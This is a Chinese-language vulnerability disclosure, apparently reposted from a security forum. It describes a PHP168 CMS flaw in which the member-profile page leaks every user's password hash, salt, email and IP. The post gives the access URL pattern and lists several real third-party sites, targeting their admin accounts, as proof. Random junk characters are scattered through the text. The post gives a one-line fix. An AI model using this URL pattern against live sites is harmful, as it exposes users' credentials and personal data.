简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
* R% M! Q1 q- ]) H5 R' G y) \& ?1 c# U
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:& F; j9 @4 E1 L3 c5 c9 \& z5 }, e
6 v+ b4 R! Q% I, C6 Uhttp://php168.cn/com/homepage.php/admin/member-profile
; w* ~0 _- R$ i" e x: u& J% M: W4 u. n
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
4 }3 i# r' R6 s2 l9 Dhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
' ?! M" s' P9 M4 L; g' O
, o, Y8 m8 B: T3 } 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
# i# j8 M/ m5 f: p% `1 e! w o# m& ^3 a5 @! }9 y) @
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
% `9 J0 g4 A! k9 z2 v% | W" }
5 d: \$ U! h8 V) {, Mhttp://www.scswl.cn/homepage.php/admin/member-profile9 a9 Y# [. E) j' T+ |
+ b- R( @ H3 z$ i: V' O% k
http://www.tunet.edu.cn/homepage.php/admin/member-profile0 e. ?8 w# y2 d! F' @( x
2 i* _/ b+ X( s5 x3 S+ z
http://www.itlead.com.cn/homepage.php/admin/member-profile: W( \+ Y( I2 b7 \; y n5 }2 B
% ?8 d/ Y2 e) ~& m3 i0 chttp://www.aedp.cn/homepage.php/admin/member-profile
! {, W) \ ^# N! L. y- L( q9 \0 [3 T! J; E J. G+ g
http://www.qianlongnews.com/homepage.php/test/member-profile
$ R7 [: [4 `0 H8 `
7 |' C& G, B O0 g( u# [http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
6 x# l) Q4 s: u/ w0 Z. { p6 M[/table] |